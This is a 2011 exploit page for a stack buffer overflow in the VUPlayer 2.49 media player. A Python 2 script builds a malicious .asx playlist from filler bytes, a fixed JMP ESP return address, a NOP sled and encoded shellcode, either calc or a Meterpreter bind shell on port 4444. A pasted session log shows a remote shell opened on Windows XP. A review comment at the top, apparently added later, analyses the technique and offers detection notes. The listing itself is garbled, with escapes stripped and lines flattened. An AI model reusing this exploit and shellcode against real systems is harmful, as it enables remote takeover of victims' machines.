
VUPlayer 2.49 Stack Buffer Overflow

Posted on 02 July 2011

# NOTE(review): this listing has been flattened by the page extraction. The
# whole script sits on three physical lines, and the backslash of every "\x.."
# escape has been lost, so the string literals below read as the characters
# 'x','4','1' rather than single bytes. As rendered, the first physical line
# (which also carries the imports, the menu text and the input() call) is one
# long comment, and the 2000-len(...) arithmetic for junk3 no longer reflects
# the author's intent. It does not run in this form; read it as a historical
# record of the technique, not as working code.
#
# What the visible text shows the original script did:
#   - Vulnerability: a stack-based buffer overflow in VUPlayer 2.49 reached
#     through an over-long href attribute of a <ref> element in an .asx
#     playlist. Decoding the hex headers gives: header1 = '<asx version =
#     "3.0" >', header2n6 = '<entry>', header3 = '<title>exploit.mp3</title>',
#     header4 = '<ref href =', header5 = '" /><entry>', header7 = '</asx>'.
#   - Buffer layout in the href value: 1012 filler bytes (junk), a 4-byte
#     little-endian return address built from the constant 0x1010539F (the
#     author's comment calls it a JMP ESP inside BASSWMA.dll), a 20-byte 0x90
#     sled, the selected payload, then 0x43 padding computed so the finished
#     file is exactly 2000 bytes once header5 and header7 are appended.
#   - The return address is a fixed absolute address; the pasted session log
#     at the top shows it being used against Windows XP. A rebased or
#     address-randomised module, or a stack cookie in the vulnerable function,
#     would invalidate that address — it is the single point the PoC hinges on.
#   - Payload choice: option 1 ("calc", described by the author as launching
#     the calculator) or option 2 ("bind", which the author labels
#     meterpreter/bind_tcp LPORT=4444). Both blobs are mostly bytes in the
#     0x30-0x5A range, which looks like the output of an alphanumeric
#     encoder; the leading decoder bytes are not analysed here.
#   - Output: the assembled bytes are written to crash.asx (dimbo) in the
#     current working directory.
#
# Defects in the script itself, independent of the extraction damage:
#   - shell = input(":") is Python 2 input() (the print statements confirm
#     Python 2), which eval()s whatever is typed — untrusted text passed to
#     eval. raw_input() followed by int() would be the correct form.
#   - When the choice is neither 1 nor 2 the "Wrong input" branch never
#     assigns payload, so the later file.write(payload) raises NameError.
#   - file shadows the builtin and the handle is closed by hand rather than
#     with a with-block; harmless here, but not idiomatic.
#
# Defender notes: an .asx playlist whose <ref href> value is roughly 1 KB of a
# single repeated byte followed by a 4-byte absolute address and a 0x90 run is
# an unambiguous indicator of this exploit class. Flagging or quarantining
# such playlist files, and not opening untrusted playlists with this player
# version, is the practical mitigation; the page states no fixed version.
#[*] Started bind handler #[*] Starting the payload handler... #[*] Sending stage (749056 bytes) to 192.168.164.147 #[*] Meterpreter session 2 opened (192.168.164.141:53820 -> 192.168.164.147:4444) at 2011-07-02 04:08:05 +0530 # #meterpreter > shell #Process 2664 created. #Channel 1 created. #Microsoft Windows XP [Version 5.1.2600] #(C) Copyright 1985-2001 Microsoft Corp. # #C:Documents and SettingsAdministratorDesktop> # from struct import pack import os import sys en = '''\n || VUPlayer v2.49 Stack BufferOverflow Exploit (calc/bind) || Author : Zer0 Thunder ------------------------------------------------------------ Select the shellcode you want 1. Calculator 2. Meterpreter BIND Shell Enter the Selected Shellcode Number ''' print en shell = input(":") dimbo = "crash.asx" header1 = "x3cx61x73x78x20x76x65x72x73x69x6fx6ex20x3dx20x22x33x2ex30x22x20x3e " header2n6 = "x3cx65x6ex74x72x79x3e " header3 = "x3cx74x69x74x6cx65x3ex65x78x70x6cx6fx69x74x2ex6dx70x33x3cx2fx74x69x74x6cx65x3e " header4 = "x3cx72x65x66x20x68x72x65x66x20x3d" header5 = "x22x20x2fx3ex3cx65x6ex74x72x79x3e" header7 = " x3cx2fx61x73x78x3e" junk = "x41" * 1012 junk2 = pack('<L',0x1010539F) #JMP ESP BASSWMA.dll nops = "x90" * 20 #Calc.exe calc= ("xdaxc1xd9x74x24xf4x5ax4ax4ax4ax4ax43x43x43x43" "x43x43x43x52x59x56x54x58x33x30x56x58x34x41x50" "x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54" "x41x41x51x32x41x42x32x42x42x30x42x42x58x50x38" "x41x43x4ax4ax49x4bx4cx5ax48x4dx59x43x30x43x30" "x43x30x43x50x4bx39x4bx55x56x51x58x52x52x44x4c" "x4bx50x52x56x50x4cx4bx56x32x54x4cx4cx4bx56x32" "x45x44x4cx4bx52x52x47x58x54x4fx4ex57x50x4ax56" "x46x50x31x4bx4fx50x31x49x50x4ex4cx47x4cx45x31" "x43x4cx54x42x56x4cx47x50x4fx31x58x4fx54x4dx43" "x31x4fx37x4dx32x5ax50x56x32x51x47x4cx4bx56x32" "x54x50x4cx4bx51x52x47x4cx43x31x4ex30x4cx4bx47" "x30x54x38x4dx55x49x50x43x44x51x5ax45x51x4ex30" "x56x30x4cx4bx51x58x54x58x4cx4bx56x38x47x50x43" "x31x58x53x5ax43x47x4cx47x39x4cx4bx47x44x4cx4b" "x43x31x58x56x50x31x4bx4fx50x31x49x50x4ex4cx49" 
"x51x58x4fx54x4dx45x51x58x47x47x48x4dx30x52x55" "x4bx44x45x53x43x4dx5ax58x47x4bx43x4dx47x54x52" "x55x5ax42x50x58x4cx4bx51x48x51x34x43x31x49x43" "x52x46x4cx4bx54x4cx50x4bx4cx4bx51x48x45x4cx45" "x51x58x53x4cx4bx45x54x4cx4bx43x31x58x50x4dx59" "x47x34x51x34x47x54x51x4bx51x4bx45x31x51x49x51" "x4ax56x31x4bx4fx4dx30x50x58x51x4fx51x4ax4cx4b" "x45x42x5ax4bx4cx46x51x4dx52x4ax43x31x4cx4dx4d" "x55x4ex59x43x30x45x50x45x50x56x30x52x48x56x51" "x4cx4bx52x4fx4cx47x4bx4fx49x45x4fx4bx5ax50x4f" "x45x49x32x50x56x45x38x4fx56x5ax35x4fx4dx4dx4d" "x4bx4fx4ex35x47x4cx45x56x43x4cx45x5ax4dx50x4b" "x4bx4dx30x52x55x45x55x4fx4bx51x57x52x33x52x52" "x52x4fx52x4ax43x30x56x33x4bx4fx4ex35x45x33x45" "x31x52x4cx52x43x56x4ex45x35x54x38x43x55x43x30" "x41x41") #meterpreter/bind_tcp LPORT=4444 bind = ("x89xe2xdaxcdxd9x72xf4x5bx53x59x49x49x49x49x43" "x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34" "x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41" "x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58" "x50x38x41x43x4ax4ax49x4bx4cx5ax48x4cx49x43x30" "x43x30x43x30x43x50x4bx39x4bx55x50x31x58x52x43" "x54x4cx4bx56x32x50x30x4cx4bx51x42x54x4cx4cx4b" "x51x42x45x44x4cx4bx43x42x56x48x54x4fx58x37x51" "x5ax47x56x50x31x4bx4fx50x31x4fx30x4ex4cx47x4c" "x43x51x43x4cx54x42x56x4cx51x30x49x51x58x4fx54" "x4dx45x51x58x47x4bx52x4cx30x51x42x56x37x4cx4b" "x51x42x52x30x4cx4bx47x32x47x4cx43x31x58x50x4c" "x4bx51x50x54x38x4cx45x4fx30x52x54x51x5ax43x31" "x4ex30x56x30x4cx4bx51x58x52x38x4cx4bx56x38x47" "x50x43x31x58x53x4bx53x47x4cx51x59x4cx4bx56x54" "x4cx4bx43x31x49x46x56x51x4bx4fx50x31x4fx30x4e" "x4cx4fx31x58x4fx54x4dx45x51x4fx37x56x58x4bx50" "x54x35x4bx44x45x53x43x4dx4bx48x47x4bx43x4dx47" "x54x43x45x5ax42x50x58x4cx4bx50x58x56x44x45x51" "x58x53x43x56x4cx4bx54x4cx50x4bx4cx4bx56x38x45" "x4cx43x31x58x53x4cx4bx43x34x4cx4bx43x31x58x50" "x4cx49x47x34x51x34x51x34x51x4bx51x4bx43x51x50" "x59x50x5ax50x51x4bx4fx4dx30x56x38x51x4fx51x4a" "x4cx4bx52x32x5ax4bx4cx46x51x4dx43x58x56x53x47" "x42x45x50x45x50x45x38x52x57x43x43x50x32x51x4f" 
"x56x34x45x38x50x4cx52x57x47x56x43x37x4bx4fx49" "x45x4fx48x4cx50x45x51x43x30x45x50x56x49x58x44" "x50x54x50x50x52x48x51x39x4bx30x52x4bx43x30x4b" "x4fx58x55x50x50x50x50x50x50x56x30x51x50x50x50" "x51x50x56x30x52x48x4bx5ax54x4fx49x4fx4bx50x4b" "x4fx58x55x4cx57x50x31x49x4bx56x33x43x58x43x32" "x45x50x54x51x51x4cx4cx49x4dx36x43x5ax52x30x50" "x56x50x57x52x48x49x52x49x4bx50x37x43x57x4bx4f" "x58x55x56x33x51x47x43x58x58x37x4dx39x56x58x4b" "x4fx4bx4fx49x45x50x53x56x33x50x57x45x38x43x44" "x5ax4cx47x4bx4bx51x4bx4fx49x45x51x47x4cx57x45" "x38x54x35x52x4ex50x4dx45x31x4bx4fx49x45x52x4a" "x43x30x43x5ax54x44x51x46x51x47x52x48x45x52x4e" "x39x4fx38x51x4fx4bx4fx58x55x4cx4bx50x36x52x4a" "x51x50x52x48x43x30x54x50x43x30x45x50x56x36x43" "x5ax45x50x43x58x56x38x4fx54x51x43x4bx55x4bx4f" "x58x55x4cx53x50x53x43x5ax43x30x56x36x50x53x51" "x47x52x48x43x32x4ex39x58x48x51x4fx4bx4fx49x45" "x43x31x49x53x51x39x4fx36x4dx55x4bx46x54x35x5a" "x4cx4fx33x41x41") if shell == 1: print "You Have Selected Calculator " junk3 = "x43" * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+calc+header5+header7)) payload = header1+header2n6+header3+header4+junk+junk2+nops+calc+junk3+header5+header7 elif shell == 2: print "You Have Selected BIND Shell " junk3 = "x43" * (2000-len(header1+header2n6+header3+header4+junk+junk2+nops+bind+header5+header7)) payload = header1+header2n6+header3+header4+junk+junk2+nops+bind+junk3+header5+header7 else: print "Wrong input" print "Have Fun !!! " file = open(dimbo , 'w') file.write(payload) file.close() #E-mail - neonwarlock@live.com #Site/Blog - http://blog.zt-security.com/ # Sri Lankan Hackers

 
